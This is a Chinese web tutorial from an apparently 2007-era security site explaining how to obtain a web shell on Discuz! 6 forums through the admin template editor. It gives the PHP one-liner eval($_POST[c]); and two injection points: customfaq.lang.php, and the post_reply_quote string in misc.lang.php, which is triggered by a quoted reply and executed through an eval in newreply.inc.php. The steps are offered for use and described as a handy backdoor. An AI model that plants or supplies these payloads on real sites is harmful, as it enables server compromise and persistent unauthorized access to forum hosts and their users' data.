Discuz! 6 后台拿Shell的方法 - 百家拳原创软件教程网

首页 | java | C/C++ | PHP | 操作系统 | ajax | 脚本编程 | 安全技术 | 本站下载页 | flex | CRM | 专题 | QQ群 | 测试中心 | 会员中心 | 积分规则

		当前位置：主页>安全技术>文章内容

Discuz! 6 后台拿Shell的方法

来源：作者：

Discuz! 6 后台拿Shell的方法

如果后台可以在线编辑模板的话，下面的方法就可以拿SHELL了：）

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:

eval($_POST[c]);

2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:

";eval($_POST[c]);"

在前台回帖处选择引用回复。
简单看下代码：

include/newreply.inc.php 107行：

复制内容到剪贴板
代码:

eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";");

呵呵，一个天然的后门：）

上一篇：Vista中的防火墙使用注意事项下一篇：使用windows脚本入侵WINDOWS服务器

[

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

用户名：（新注册）密码：匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·世界第一黑客提出计算机安全十大
·教你如何进入有密码的WindowsXP
·Windows NT/2K/XP系统下获取管理
·网站入侵10大隐患
·学会在Linux下对硬盘分区
·找回Redhat的超级用户密码
·推荐:ASPX一句话木马--终极版&详
·Cisco路由器安全配置方案
·永远不怕IE主页被修改
·手动杀熊猫.威金变种等经验
·加强边界路由器安全防护能力的9
·木马藏身的地方

相关文章

·Vista中的防火墙使用注意事项
·使用windows脚本入侵WINDOWS服务
·看看您是否真懂网络安全？
·教你学会七种维护服务器安全最佳
·学会检查SQL注入式攻击漏洞
·利用JPEG漏洞的病毒攻击程序代码
·强搜天线搜出WiFi世界的安全漏
·128M内存如何安装并使用卡巴斯基
·细说暴库的原理与方法（四）
·细说暴库的原理与方法（三）
·细说暴库的原理与方法（二）
·细说暴库的原理与方法（一）

相关信息

copy right @ 百家拳软件项目研究室 2007 辽ICP备07011763